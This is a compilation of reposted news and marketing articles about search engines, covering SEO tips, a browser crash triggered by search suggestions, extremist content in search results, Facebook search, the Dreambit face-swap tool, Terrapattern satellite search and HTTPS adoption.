Security researchers from Nightwatch Cybersecurity have discovered a way of crashing Chromium and Firefox browsers on mobile and desktop devices.

Their method relies on using the search suggestions feature that these browsers support. The issue is not a software bug, but a design implementation that allows their attack to be executed.

Most of today's browsers have a search field or allow users to search via the URL address bar. Based on the search engines supported inside the browser, search suggestions can be shown as the user types their query.

2GB search suggestion reply

Nightwatch security experts say that if the browser's search engine provider doesn't protect these search suggestions via an encrypted HTTPS channel, an attacker on the local network can intercept search suggestions queries and answer before the search provider.

An attacker can insert large chunks of data inside this response, which can lead to the browser or the operating system exhausting memory resources and eventually crashing.

The good news is that researchers weren't able to execute malicious code during these crashes, which would have caused more problems for browser makers.

During their tests, researchers managed to crash the Android stock browser on Android 4.4, Chrome 51 on Android 6.01, and Firefox 47 on Ubuntu 16.04. Additionally, they also crashed the entire Ubuntu 16.04 OS when running Chrome 51.

Not a security issue, so a bugfix is coming later during the year

In order for this crash to occur, as mentioned above, users need to use a browser built-in search provider that doesn't employ HTTPS. The list includes Ebay on Firefox, AOL and Ask.com on Chrome, and Bing and Yahoo on Android's stock browser.

Internet Explorer, Edge, and Safari aren't affected by this issue. Safari had to deal with its own search-induced crash at the start of the year, so its reputation is not as clean as you might think.

The Android, Chrome, and Firefox teams declined to classify this bug as a security issue, since it actually isn't, meaning that a fix will be coming later rather than sooner.

chrome-firefox-vulnerable-to-crashes-via-search-suggestions 

http://news.softpedia.com/news/chrome-firefox-vulnerable-to-crashes-via-search-suggestions-506722.shtml

Categorized in Search Engine

In my colleague Matt Lester’s recent Search Engine Land column, he discussed  ten tips for a more effective paid search campaign. For this article, I’ll follow up Matt’s advice with ten tips to help you develop a more effective search engine optimization (SEO) campaign. But before we dive into the tips, let’s briefly look at what SEO is and its key concepts.

SEO, quite simply, involves designing your website to improve its ranking in organic search results on search engine results pages (SERPs). And by optimizing for terms that your target audience will use to search, you will drive relevant traffic to your site that has a better conversion rate.

The key concepts in SEO (credit to Search Engine Land Features Editor Vanessa Fox  for the inspiration on this) are straightforward: relevance, discoverability, and crawlability. Relevance means keeping to a topic and helping the search engine understand what your site is about (ideally it’s about one thing in particular). Discoverability means telling the world about your site. The technical details and environment may have changed, but search marketing is still just marketing. Get your website out there, communicate with the online world and your users. And finally, crawlability means making the site accessible. Search engines regularly send out automated programs called web crawlers, and it’s these crawlers that will visit your site and try to understand your content. Help the search engine crawlers find every page on your site and make sure they can understand what they’re seeing.

And now for the Top 10 SEO Tips:

1. Keyword research is the first step in SEO. Take the time to figure out what words are used by the people you want to visit your site, and then use these words on the relevant page. In particular, make sure you use these keywords in the first few words of your page title because this is the most important bit of the page from a search engine’s perspective.

2. Get trustworthy advice from SEO sources on the web. Unfortunately, not everyone knows as much as they say they do online and far too often SEO forums are full of bad advice; choose your sources well. A few we recommend: Google engineer Matt Cutts’ blog, Search Engine Journal,SEOmoz, and of course, Search Engine Land.

3. Look after your code. This means building a website that is easy for the search engines to understand. Your website should make use of up-to-date technologies like Cascading Style Sheets (CSS) to minimize the amount of formatting in the HTML page code.

4. Make navigation easy. You can do this by building clear text links to all parts of your site. Search engines can’t follow image links or clever animated links like Flash; they like their navigation plain and simple—and so do many users.

5. Get links from trusted, relevant sources. Links are like a vote for your site and you can’t rank well without them. Unfortunately, buying links or being indiscriminate in the places you link to and places you request links from is no longer a good way to raise the importance of your site; think quality, not quantity. Links must be relevant to the content of your site and they must be from reputable websites.

6. Build a sitemap page. Building a sitemap helps search engines discover every page in your website. The best sitemaps list the pages in your site along with brief keyword-rich descriptions of the page. If you have too many pages on your site, create as many sitemaps as you need and make sure they’re linked together.

7. Don’t forget the technical stuff. There is a lot happening technically in the background that can cause problems with the way the search engines see your site. For example, if you use a cheap web hosting company, you might be bundled on to the same web server as a pornographic site that Google really doesn’t like—guilt by association. Also, does your website use techniques that search engines don’t like, like certain types of redirection? If in doubt, ask your web design company.

8. Track your progress with a web analytics program. There are lots of options to use; Google Analytics in particular is easy to use, versatile, and it’s free. Web analytics can tell you a great deal about how people interact with your site and how much traffic the search engines are sending you.

9. Tell search engines where you are. You can do this by submitting your site details to search engines. This doesn’t guarantee a better position in the results, but it certainly helps. Google, Yahoo, and Microsoft all have a facility to submit a list of all the pages in your site.

10. Remember that content is king. Building great content and keeping it up to date is the key to SEO. Search engines love sites like blogs, which are highly topical and regularly refreshed. But always remember to put your visitors first—at the end of the day, even a site that ranks well and gets lots of traffic is no good if the visitors don’t like what they see.

As I said, these my top ten SEO tips. There are many others, but these are tried and true methods to get your company moving in the right direction… up to the top of search engine results pages.

http://searchengineland.com/10-fundamental-tips-to-improve-your-seo-14024

As search engine optimization (SEO) professionals, we obsess with search data from a wide variety of resources. Which one is best for our clients? Which keyword research tool reveals the most accurate search behaviors when rebuilding a site’s information architecture? Does our web analytics data validate our keyword research?

And, more importantly, did these tools provide your most desired information? Some answers might surprise you.

Keyword research data

I love keyword research tools. I use all of them because I can discover core keyword phrases, which are commonly used across all of the commercial web search engines. And I can also tailor ads and landing pages to searchers who typically use a single, targeted search engine (and it isn’t always Google, as one might imagine).

However, keyword research tools are not a substitute for a knowledgeable and intuitive search engine marketer. All too often, website owners and even experienced search engine optimization professionals launch into a site’s information architecture without gauging user response. As good SEO professionals, we should understand when it is appropriate to implement keywords into a site’s information architecture: when keyword usage overwhelms users, and when keyword usage needs to be more apparent.

This situation occurred recently when I was performing some usability tests on a client site’s revised information architecture. This particular client website is being delivered in multiple languages. We were testing American English, British English, and French. Therefore, the test participants were American, British, and French.

All of the keyword research tools showed the word “student” or “students” (in French, “étudiant” or “étudiants”) as a possible target. The appearance of this word in both keyword research data and in the site’s web analytics data led my client to believe that we should make this area a main category.

If we had relied on the data from keyword research tools, we would have been wrong. If we had relied on the data from web analytics software, we would have been wrong.

The face-to-face user interaction gave us the right answer.

The facial expressions were enough to convince me. Almost every single time the word “student” or “étudiant” appeared during the usability test, I saw confusion. When I asked test participants why they seemed confused, they said that the particular keyword phrase was not appropriate for that type of website. They then placed the student-related information groupings in one of two piles:

  • Discard – Participants felt that the information label and/or grouping did not belong on the website at all.
  • Do not know – Participants were unsure whether the information label and/or grouping did or did not not belong on the website.

The discard pile won, with over 90% from all three language groups.

Now, imagine if this company did NOT have one-on-one interaction with searchers during the redesign process and only relied on keyword research tools. How much time and money might have been wasted?

Keyword research data is not the only type of data that can be easily misinterpreted.

Web analytics search data

One search metric that clients and prospects inevitably mention is “stickiness.” In other words, one of their search marketing goals is to increase the number of page views per visitor via search engine traffic, especially if the site is a publisher, blog, or news site. Increasing the number of page views per visitor provides more advertising opportunities as well as a positive branding impact. The average time on site (if it is longer than two minutes) is also commonly viewed as a positive search metric.

Or so it might seem. Here is an example.

Many SEO professionals, including me, provide blog optimization for a wide variety of companies (ecommerce, news, software, etc.). Not only do we provide keyword research for blogs, we must also monitor the effectiveness of keyword-driven traffic via web analytics data.

Upon initial viewing, the blog’s analytics data might indicate increased stickiness. Searchers are reading more blog entries. Searchers are engaged. Therefore, the blog content is great…that is a common conclusion.

For an exploratory usability test, I ask test participants to tell me about a blog post that they found very helpful. I asked them why they liked the blog’s content, and I listen very closely for keyword phrases. Audio and/or video recording makes this job a little easier.

When I asked test participants to refind desired information on a blog on the lab’s computer, I did not hear, “This blog content is great!” Comments I frequently heard were:

  • “I can’t find this [expletive] thing.”
  • “Now where could it be? I saw it here before….”
  • “I think this was posted in [month/day/year]….”
  • “Where the [expletive] is it?”

As you might imagine, the use of expletives became more and more frequent with the increased number of page views.

Sure, searchers who discover great blog content might bookmark the URL, or they might link to it from a “Links and Resources” section of their web site, or they might cite the URL in a follow-up post on another website. All of these actions and associated behaviors make it easier for searchers to refind important information.

However, when I review web analytics data, I often find that site visitors do not take these actions as frequently as people might think. Instead, with careful clickstream analysis combined with usability testing, I see that the average page view per visitor metric is heavily influenced by frustrated refinding behaviors.

Conclusion

I have always believed that search engine optimization is part art, part science. Certainly, keyword research data and web analytics data are very much part of the “science” part of SEO.

Nevertheless, the “art” part of SEO comes into play when interpreting this data. By listening to users and observing their search behaviors, having that one-on-one interaction, I can hear keywords that are not used in query formulation. I study facial expressions and corresponding mouse movements that are associated with keywords. I see how keywords are formatted in search engine results pages (SERPs) and corresponding landing pages, and how searchers react to that formatting and placement.

I cannot imagine my job as an SEO professional without keyword research tools and web analytics software. In addition, I cannot imagine my job as an SEO professional without one-on-one searcher interaction. What do you think? Have any of you learned something that keyword research tools and/or web analytics data did not reveal?

http://searchengineland.com/when-keyword-research-and-search-data-deceives-14613

Categorized in Search Engine

This is a sponsored post written by me on behalf of Bing Network. All opinions are 100% mine.

I’ve always been fascinated by the constant evolution of search. It scares me to accept that I’ve never been able to get the full grasp of these changes. I couldn’t sit still.

My career was built on writing and consulting about SEM. I should be prepared for the future. I should know what’s coming next. But, I don’t.

The future of search has me in a constant spin cycle.

Do you feel this way? Bing has 133 million monthly searches. Google hit over 100 billion. That’s a lot to take in. The good news is this hasn’t stopped me (or others!) from digging into these changes.

This past year working at SEJ has allowed me to explore new strategies to help explain the future of SEM. I discovered that I’ve been looking at the future of search all wrong. And, I think a lot of us have.

What is the Future of Search?

I’ve worked on over 100+ SEM clients. The majority of them focused only on increasing their rankings on Google.

This is where I went wrong.

I shouldn’t be focused on increasing rankings in Google, creating more content, or building more links. I should be focused on the user.

In 2016, we’re seeing marketers approach this in different ways:

Understanding searcher intent – Making it easy for searchers to get better search results by personalizing our content to answer queries and voice search.

Exploring multiple search channels – Building a search strategy outside of Google that reaches your target audience on the platforms they live.

Rand Fishkin has an amazing Slideshare on this:

The 7 Biggest Trends in SEO: 2016 from Rand Fishkin
For example, Confluent Forms worked with Michlin Metals to optimize for intent-based search. Confluent Forms altered the meta data and saw an upward spike in impressions, clicks and click-through rate, and position. And, they were even featured in a Google Answer Box. Optimizely increased conversions by 32% for Secret Escapes by matching user intent with expectation between landing page copy and PPC ads.

And, let’s not forget about the other search channels. Marin Software grew Sykes Cottage conversion volume on Bing by 259%. Hello Society increased referral traffic from 3,952 to 16,592 in one month on Pinterest.

All of this is how I now understand search will work in the future. Yep, I was missing the whole point all along.

In 2000, my main channels were paid search and organic search. Fast forward to 2016, to compete you must be on paid, organic, local, image, video, map, social, news, mobile, and voice search.

Whew! That’s a lot!

Does this New Way of Search Marketing Work for Big or Small Brands?

The short answer: Both.

Businesses spend thousands of dollars on PPC and SEO campaigns each year looking for the right audience. Utilizing tools like Bing’s Remarketing campaigns allows both big and small brands to benefit from targeting consumer buying behaviors for better ad conversions with minimal spend. AdWords also offers remarketing ads, so I’d analyzing both avenues before allocating your budget.

For me, smaller brands with a limited budget see greater success on Bing because the cost-per-click has been lower. WordStream also saw an average of 33.5% cheaper CPC on Bing.

In addition to advertising, businesses will also need to adapt to the new way users are searching. According to comScore, 50% of all searches will be voice searches by 2020. Voice search uses a more natural tone, which changes the search results.

Tech Goliaths like Microsoft, Apple, and Google, are focusing on new digital assistants, like Cortana. Cortana (iOS, Android, Windows), has already seen 2.5 billion questions asked globally. Pretty crazy, huh? Digital assistants are transforming how searchers use mobile. Searchers are bypassing Google search and using apps or voice search for their queries.

This means more opportunities for marketers to influence consumers and measure the impact of search on other channels.

Takeaways

It seems to me that the next generation of search will rely on helping businesses personalize their brand to reach a very niche audience. There is a whole new side for SEM marketers to explore — and potentially some awesome benefits, too!

Brands can expand their reach by utilizing multiple search engines.
The content based on user intent and conversational language will have a greater impact.
Investing in personalized ad campaigns can bring in higher conversions.

For all the work we do with perfecting our strategies, perhaps these coming years bring us the opportunity to engage on a deeper level more meaningful level, not only with our audience but with our brands too.

I’d love your thoughts on this! Feel free to discuss in the comments or on Twitter.

https://www.searchenginejournal.com/search-marketing-is-the-future-right/169326/

More than 484,000 Google keyword searches a month from around the world, including at least 54,000 searches in the UK, return results dominated by Islamist extremist material, a report into the online presence of jihadism has revealed.

The study found that of the extremist content accessible through these specific keyword searches, 44% was explicitly violent, 36% was non-violent and 20% was political Islamist in content, the last being non-violent but disseminated by known Islamist groups with political ambitions.

The study is one of the first to expose the role of the search engine rather than social media in drawing people to extremist jihadi material on the web. It argues the role of the search engine – a field dominated by Google – has been a blind spot that has been missed by those seeking to measure and counter extremist messages on the internet.

Although the UK government’s Prevent strategy claims the internet must not be ungoverned space for Islamist extremism and British diplomats have taken the lead in the global communications fight against Islamic State on the net, the study suggests government agencies are only at the beginning of a “labyrinthine challenge”. So-called counter-narrative initiatives led by governments and civil society groups are “under-resourced and not achieving sufficient natural interest”, suggesting the battle of ideas is not even being engaged, let alone won.

The study, undertaken jointly by Digitalis and the Centre on Religion and Geopolitics, will be challenged by those who claim it advocates censorship, has blurred the lines between political Islam and violent extremism and cannot validly quantify the presence of extremism.

But the findings come in a week in which there has been a spate of terrorist attacks in Germany and France, some undertaken by young people either radicalised on the internet, or using it to feed their obsession with violence. Many of the jihadist foreign fighters in Syria were radicalised online as “the search engine gradually overtakes the library and the classroom as a source of information”.

The study, entitled A War of Keywords: how extremists are exploiting the internet and what to do about it, argues “many of the legitimate mainstream Islamic scholarly websites host extremist material, including jihadi material, often without any warning or safeguards in place”.

It also argues non-violent Islamist organisations, such as Hizb ut-Tahrir, have a very strong online presence and dominate the results for some keyword searches. Some of the most popular search words used were crusader, martyr, kafir (non-believer), khilafa (a pan-Islamic state) or apostate.

In a condemnation of government efforts it finds very little of this content is challenged online. Analysing 47 relevant keywords, the search-engine analysis found counter-narrative content outperformed extremist content in only 11% of the results generated. For the search term khilafah, which has 10,000 global monthly searches, the ratio of extremist content to counter-narrative is nine to one.

This is partly because counter-narrative sites lack search engine optimisation so they do not rank high enough in searches, By contrast, Khilafa.com, the English website of Hizb ut-Tahrir, had more than 100,000 links into it.

The study also warns some of the most-used Muslim websites such as Kalmullah.com and WorldofIslam.info “host traditional Islamic content alongside extremist material” so are knowingly or unknowingly abusing the trust of their readers.

The study also claims a user can come across extremist content relatively easily while browsing for Islamic literature. Few effective restrictions apply to accessing Islamic State English-language magazine Dabiq or Inspire magazine, which is linked to al-Qaeda in the Arabian peninsula. Both are readily available to browse and download through clearing sites.

The study produced its headline numbers by looking at the average monthly number of global searches conducted in Google for 287 extremist-related keywords – 143 in English and 144 in Arabic. It then looked at two samples totalling 47 keywords, the first sample focused on the most-used words and the second sample on the keywords deemed to be most extremist. The research then analysed the first two pages thrown up by the search for these keywords.

The authors acknowledge the difficulties technology companies face in policing the results of their search engines. Google is responsible for 40,000 searches a second, 2.5 billion a day and 1.2 trillion a year worldwide. Facebook boasts more than one and a half billion users who create 5 billion likes a day.

Dave King, chief executive of Digitalis, argues: “While the company’s advertising model is based on automatically mining the content its users create, their ability to distinguish a single credible kill threat from the plethora who have threatened to kill in jest is highly limited.”

The study recommends governments, the United Nations, technology companies, civil society groups and religious organisations together establish a charter setting out a common definition of extremism and pledge to make the internet a safer place.

Technology companies, the report says, could work with governments to shift the balance of the online space, as well as share analytical data and trending information to bolster counter-efforts. It suggests search engine companies have been reluctant to or unable to alter the search algorithms that are responsible for search page rankings.

The authors also call for a debate on “the murky dividing line between violent and non-violent extremist material online”, arguing such legal definitions have been achieved over “copyrighted material, child pornography and hate speech all of which have been subject to removal requests.”

Exiisting content control software that prevents access to graphic or age-restricted material could be used and warning signals put on sites.

A Google spokesperson said: “We take this issue very seriously and have processes in place for removing illegal content from all our platforms, including search. We are committed to showing leadership in this area – and have been hosting counterspeech events across the globe for several years. We are also working with organisations around the world on how best to promote their work on counter-radicalisation online.”

https://www.theguardian.com/technology/2016/jul/28/search-engines-role-in-radicalisation-must-be-challenged-finds-study

Categorized in Search Engine

Facebook Inc (NASDAQ:FB) wants to be a popular place to search for mentions of current news, in order, to get more public chatter, which normally is done on Twitter, says a report from TechCrunch. The social networking site though stumbled with its natural language Graph Search, refocused on keywords and is now seeing 2bn searches per day of its 2.5 trillion posts. In comparison, it was 1bn in September 2012 and 1.5bn searches per day in July 2015 – a 33% jump in just 9 months.

Facebook Inc. (NASDAQ:FB)

Facebook wants to rule chatting space

On the recent earning’s call, the Chief Executive – Mark Zuckerberg – said, “The growing way that people use search is to find what people are saying about a topic across more that 2.5 trillion posts. Now people are doing more than 2 billion searches a day between looking up people, businesses, and other things they care about.”

What the co-founder did not say, but certainly indicated was that the social network thinks the people should talk about things on its site because their words will find new audiences thanks to its massive user base and powerful search engine, the report says. This chatting space is actually ruled by Twitter, but since launching public post search last year, Facebook Inc(NASDAQ:FB) has been attempting to dominate the space.

Through paid search ads, the social media giant could open up new monetization opportunities if it can keep generating more search queries. However, the CEO cautioned that it was not going to happen overnight.

How it plans to do it?

Initially, Facebook’s search engine primarily focused in assisting the user find people they had met in real life and add them as friends. Then in 2013, the social network touted its semantic Graph Search engine as the third pillar of its service alongside the profile and feed. The users were, however, confused by the complex search queries required.

Eventually, the tech giant retreated the Graph Search, and released the true keyword search in late 2014 to allow users find posts by them or their friends. Later, the firm expanded that to include all 2 trillion posts on the social media.

For Facebook Inc (NASDAQ:FB), it was a huge turning point because it pitted its search engine finally against Twitter. The main aim of the social network is to underline why people should talk more on its network. For this, the social media giant built a special sports chatter feature called Stadium, and also focused on Facebook Live for citizen journalism.

Zuckerberg, on being asked about monetizing commercial searches, did hint of keeping the search business model for later. Even though this announcement was about search, its Twitter who should be concerned not Google.

On Wednesday, Facebook shares closed up 1.75% at $123.34. Year to date, the stock is up over 16% while in the last one-year, it is up over 27%.

http://learnbonds.com/130381/facebook-battles-twitter/

Categorized in Others
  • Type terms in the search engine and AI mines for related images
  • Uses facial processing, recognition, 3D reconstruction, age progression
  • Can be used to identify missing children after years they have been gone
  • Also show actors/actresses how they would appear in a specific role

Trying to picture yourself older or with a different hairstyle is near impossible.

But now researchers have developed the ultimate face swap that analyzes a picture of your face, searches for images using key terms and seamlessly maps your it onto the results.

Called Dreambit, this AI lets anyone see what they would look like with a different hairstyle or colour, or in a different time period, age, country or anything that can be queried in an image search engine.

Dreambit lets anyone see what they would look like with a different hairstyle or colour, or in a different time period, age, country or anything that can be queried in an image search engine - as it has done with American actor George Clooney (pictured).
 

Dreambit lets anyone see what they would look like with a different hairstyle or colour, or in a different time period, age, country or anything that can be queried in an image search engine - as it has done with American actor George Clooney (pictured).

'Dreambit is a personalized image search engine,' reads the website.

Although currently only in a closed beta, the site is expected to open to allcomers later this year. 

'Given one of more photos and a text query, it outputs versions of the input person in the query appearance. 

This software is the brainchild of Ira Kemelmacher-Shlizerman, who is a computer vision researcher at the University of Washington.

 

To transform themselves, users type any terms in the search engine, such as 'curly hair,' 'India' or '1930' and the software will mine through Internet photo collections for similar images in that specific category.


Dreambit draws on previous research from the university and other work in facial processing, recognition, three-dimensional reconstruction and age progression, combining those algorithms in a unique way to create the blended images.


Not only will this software create pictures of you 15 years older or give you the long lushes locks you have always wanted, it is also helpful for identifying missing children or individuals evading the law who purposely disguise themselves.

Many children who go missing unfortunately aren't found until many years down the road – if ever.

HOW DOES DREAMBIT WORK?

Users first upload a picture of themselves

 

Dreambit is a personalized image search engine.

This AI analyzes a picture of your face, searches for images using key terms and seamlessly maps your face onto the results.

Users can type in any term in the search engine, such as 'curly hair,' 'India' or '1930' and the software will mine through Internet photo collections for similar images in that specific category - then maps your face onto the result.

The software lets anyone see what they would look like with different hairstyle or colour, or in a different time period, age, country or anything that can be queried in an image search engine.

Dreambit draws on previous research from the university and other work in facial processing, recognition, three-dimensional reconstruction and age progression, combining those algorithms in a unique way to create the blended images. 

This software is the brain child of Ira Kemelmacher-Shlizerman, who is a computer vision researcher at University of Washington. 

 

To transform themselves, users type any terms in the search engine, such as 'curly hair,' 'India' or '1930' and the software will mine through Internet photo collections for similar images in that specific category. 

To transform themselves, users type any terms in the search engine, such as 'curly hair,' 'India' or '1930' and the software will mine through Internet photo collections for similar images in that specific category. 

This new system is capable of looking at an advanced age and with close accuracy – as it has predicted a 1-year-old boy and 4-year-old girl at subsequent ages.

Kemelmacher-Shlizerman and her team previously created automated age progression software that focused just on the person's face, but this new AI can add varied hairstyles and other contextual elements.

how would you look like with blonde hair curly hair in 1930 in india

The AI's new feature lets parents image what their child might look like five or 10 years from now under different circumstances — with red hair, curly hair, black hair or even a shaved head.

'It's hard to recognize someone by just looking at a face, because we as humans are so biased towards hairstyles and hair colors,' said Kemelmacher-Shlizerman.

'With missing children, people often dye their hair or change the style so age-progressing just their face isn't enough.'

Users type any terms in the search engine, such as 'curly hair,' 'India' or '1930' and the software will mine through Internet photo collections for similar images in that specific category. Then it will seamlessly map your face onto the results, as the software has done with the American actor Kerri Russell (pictured)

Users type any terms in the search engine, such as 'curly hair,' 'India' or '1930' and the software will mine through Internet photo collections for similar images in that specific category. Then it will seamlessly map your face onto the results, as the software has done with the American actor Kerri Russell (pictured)

'This is a first step in trying to imagine how a missing person's appearance might change over time.'

Another application for the technology will let actors or actress envision how they might appear in a specific role.

 

Not only will this software create pictures of you 15 years older or give you the long locks you have always wanted, it is also helpful for identifying missing children or individuals evading the law who purposely disguise themselves. Dreambit  has predicted a 1-year-old boy and 4-year-old girl at subsequent ages (pictured)
 

Not only will this software create pictures of you 15 years older or give you the long locks you have always wanted, it is also helpful for identifying missing children or individuals evading the law who purposely disguise themselves. Dreambit  has predicted a 1-year-old boy and 4-year-old girl at subsequent ages (pictured)

For example, the system can marry internet photographs of the actress Cate Blanchett and Bob Dylan to predict how she would appear playing the Dylan role in the movie 'I'm Not There.'

'This is a way to try on different looks or personas without actually changing your physical appearance,' said Kemelmacher-Shlizerman, who co-leads the UW Graphics and Imaging Laboratory (GRAIL).

'While imagining what you'd look like with a new hairstyle is mind blowing, it also lets you experiment with creative imaginative scenarios.'

The software system analyzes the input photo and searches for a subset of internet photographs that fall into the desired category but also match the original photo's face shape, pose and expression.

Another application for the technology will let certain actors or actress envision how they might appear in a role. For example, the system can marry internet photographs of the actress Cate Blanchett and Bob Dylan (pictured) to predict how she would appear playing the Dylan role in the movie 'I'm Not There'
 
 

Another application for the technology will let certain actors or actress envision how they might appear in a role. For example, the system can marry internet photographs of the actress Cate Blanchett and Bob Dylan (pictured) to predict how she would appear playing the Dylan role in the movie 'I'm Not There'

Its ability to accurately and automatically synthesize two photographs stems from the combination of algorithms that Kemelmacher-Shlizerman assembled, as well as the sheer volume of photos available on the internet.

'The key idea is to find a doppelgänger set — people who look similar enough to you that you can copy certain elements of their appearance,' said Kemelmacher-Shlizerman.

'And because the system has hundreds of thousands of photos to choose from, the matching results are spellbinding.'

 

MIND-READING AI KNOWS WHO YOU ARE THINKING ABOUT

 

New research from Kuhl Lab at the University of Oregon has revealed that computer can now analyse brain scans and work out who a person is thinking about.

The AI system can even create a digital portrait of the face in question.

Researchers began their work with more than 1,000 coloured images of different human faces.

 

 

Researchers have reconstructed a face after peering into the mind of another by extracting latent face components from neural activity and using machine learning to create digital portraits. Researchers worked with more than 1,000 coloured images of different human faces

During the first part of the study they showed participants one face after another while performing fMRI scans and recorded neural responses during this time.

Researchers used an innovative form of fMRI pattern analysis to test whether lateral parietal cortex actively represents the contents of memory.

Using a large set of human face images, the first extracted latent face components, known as eigenfaces.

Then machine learning algorithms were used to predict face components from fMRI activity patterns and reconstruct images of individual faces in digital portraits.

This process is similar to how the mind’s eye sees a person, as object recognition has to endure a few stages, from the moment we lay eyes on it to the point we know exactly what it is.

http://www.dailymail.co.uk/sciencetech/article-3702341/The-ultimate-face-swap-New-search-engine-face-hairstyle-reveal-ll-age.html

Categorized in Search Engine

SANTA FE, NM--(Marketwired - June 29, 2016) - The leading provider of online reviews, CrowdReviews.com, has released a set of tips to assist businesses in finding digital marketing agencies offering exceptional SEO services based on their own needs and requirements. The tips outline different strategies businesses can use to determine whether a company has an extended history of positive reviews or not. While the tips do not provide a means to achieve guaranteed results, the tips can help reduce the risk of selecting a search engine optimization agency which consistently fails to meet their client expectations.

CrowdReviews.com first recommends that buyers consider search engine optimization agencies which have a history of in-depth reviews written by their customers. As the Internet has become a primary source for research, it has also become an opportunity for many companies to create their own reviews. It is recommended for buyers to not only try to identify reviews which may be critical of online marketing agencies, but to utilize multiple reviews and sources. Many vendors will include testimonials on their website; CrowdReviews.com provides reviews on vendor profiles as a means of allowing buyers to determine the merit which the reviews have over the quality of the service.

Second, it is recommended for businesses to receive quotes from multiple SEO companies. Online marketing agencies should be able to provide a detailed quote for the services they are offering including their search engine optimization. Being able to compare quotes between multiple vendors can identify those which pay more attention to the needs of their customers and those which put more effort into their SEO clients compared to companies that try to service as many as possible with as few resources as possible.

http://www.marketwired.com/press-release/crowdreviewscom-reveals-tips-for-selecting-search-engine-optimization-companies-2138418.htm

Categorized in Search Engine

Thanks to a small team of artists and coders, you may now explore cities through patterns of infrastructure as captured in aerial photography. Terrapattern, developed at the Carnegie Mellon Frank-Ratchye STUDIO for Creative Inquiry, is the first open-access visual search tool for satellite imagery. It is currently available for Pittsburgh, San Francisco, New York City, Detroit, Austin, Miami, and Berlin. This means you may scan these cities’ landscapes for common forms of your particular interest that are not conventionally labelled on a map: circular backyard pools or cul-de-sacs, perhaps, or even dilapidated nautical wrecks. All you have to do is find the tile of topography that intrigues you, and dozens of search results of similar views will arrive courtesy of machine learning algorithms trained to sift through images from OpenStreetMap. You can then export these images as a geographic text file.

There is an alluring and satisfying poetry in the composite images formed by the results of scattered sites brought together, but you’re probably wondering what useful purpose Terrapattern might serve. STUDIO for Creative Inquiry’s director and new-media artist, Golan Levin, who headed the project, emphasizes that the team did not create Terrapattern with a specific objective in mind. Rather, working with developerDavid Newbury, artist Kyle McDonald, and students Irene AlvaradoAman Tiwari, andManzil Zaheer, he hopes their tool will allow users to do whatever they would like with it, whether that means using it to understand the environment or for humanitarian projects or even for pure recreation. One of Levin’s friends is hunting for empty swimming pools to jump into for guerrilla skateboarding. Online, the team references initiatives byMonitoring of the Andean Amazon Project and by DataKind.org as precedents. In this sense, Terrapattern is intended, as its developers put it, to “democratize geospatial intelligence,” providing the everyday person with a power that lies largely in the hands of state actors or big corporations. But Levin also considers it an artwork that provides people with new insight into their cities.

“My hope for this project [is] that it is an influential prototype that allows people to suddenly think in a new way about satellite imagery,” Levin told Hyperallergic. “It’s what I would call a revelatory artistic practice, in which I’m trying to allow people to see the world in a new way. To give people this kind of view — this kind of panoptic perceptron that allows them to see connections in the landscape that they couldn’t see before — is a power that I’m really pleased to be able to present in the form of an interactive networked artwork.”

tennis

Purple tennis courts in San Franciso 

It’s easy to while away time on Terrapattern, even if you don’t really have a set intention. Clicking around invariably leads to some interesting, visual understandings of urbanism, even if they don’t necessarily carry great social meaning. For instance, I could easily use GoogleMaps to search for tennis courts in San Francisco, but Terrapattern allows me to see how many purple ones the city has. Perhaps more helpful to some is how easy the project makes it to find buildings with solar panels on their roofs. In Pittsburgh, you’ll find neighborhoods rife with round yard pools and cul-de-sacs; contrasting with these indicators of suburbia are the shipping container yards of New York City, with cars neatly lined up like colorful bits of unused chalk; or the areas in Detroit where expressways intersect, which, when compiled, form a giddy snapshot of urban transportation. I was also able to locate the sections of New York City’s overflowing cemeteries that are divided by wide roads, a collection of images that alludes to the city’s history of negotiating the relationship between its dead and its living.

Of course, users are not restricted to only tracking infrastructure. The Carnegie Mellon team has collected images of boat wakes in rivers; one of my first searches was for clusters of yellow taxi cabs. Such tiled images of ephemeral forms exemplify Terrapattern’s potential for all sorts of discovery. Terrapattern is currently in alpha mode, and its developers are working to roll out more cities soon. On deck next are London and Johannesburg.

“Mostly I want to give people this fun experience, where they spend time clicking around and think this is fascinating even if they don’t really know what it’s good for,” Levin said. “If someone spent two hours with it, that indicates this is something profound.”

detroit

Intersecting expressways in Detroit

 

Areas of cemeteries divided by roads in New York City

Areas of cemeteries divided by roads in New York City

 

taxis nyc

Clusters of cabs in New York City

 

detroit2

Dilapidated plots in Detroit

 

waves

Boat wakes in New York City rivers

 

culdesacs

Cul-de-sacs in Pittsburgh

 

Shipping container yards in New York City

Shipping container yards in New York City

 

Solar panels in New York City

Solar panels in New York City

http://hyperallergic.com/301858/a-visual-search-engine-for-the-aerial-patterns-of-cities/

Categorized in Search Engine

Two years after Google announced HTTPS would become a ranking signal, Dr. Pete Meyers of Moz has put together a study with revealing new findings about the adoption rate of HTTPS since the announcement was made.

When Google made its official announcement regarding HTTPS, some were quick to make the transition, while others believed the effort wasn’t worth the potential reward. Some have avoiding transitioning to HTTPS because they believe there are possible risks associated with doing so.

Dr. Pete Meyers has put together the data which suggests Google is slowing but surely accomplishing its goal of having more HTTPS sites on the web. Here is a summary of his finding.

The Findings

Before Google’s HTTPS algorithm update, Moz’s data showed that only 7% of the pages featured on the first page of Google’s search results were HTTPS. A week later, that number rose to 8%.

Two years later, that number has multiplied to over 30%:

“As of late June, our tracking data shows that 32.5% (almost one-third) of page-1 Google results now use the “https:” protocol.”

The fact that the increase has been a gradual progression leads Dr. Meyers to believe it was not purely the result of algorithm updates alone. Rather, the increase in HTTPS sites on the first page of Google’s search results is an indication that Google’s PR campaign is working.

Dr. Meyers predicts than in a another 1–1.5 years we will 50% of first page search results being comprised of HTTPS sites. When this time comes, Dr. Meyers also predicts that Google will strengthen the ranking signal.

The Risks

Google has been downplaying the risks of migrating to HTTPS, Dr. Meyers argues, as there is risk associated with any kind of sitewide change to URLs.

Before migrating to HTTPS, it’s recommended that you weigh the time, money, and possible risk against receiving a minor algorithmic boost. With that being said it’s still difficult to convince website owners that converting to HTTPS is worth it.

Dr. Meyers’ final recommendation is, if you’re still not sold on HTTPS, then at least be aware of how many sites in your industry are making the switch. Stay alert for another HTTPS algorithm update which could be coming within a year’s time.

https://www.searchenginejournal.com/30-search-results-now-https-according-moz-study/167515/

Categorized in Search Engine

Get Exclusive Research Tips in Your Inbox

Receive Great tips via email, enter your email to Subscribe.
Please wait

airs logo

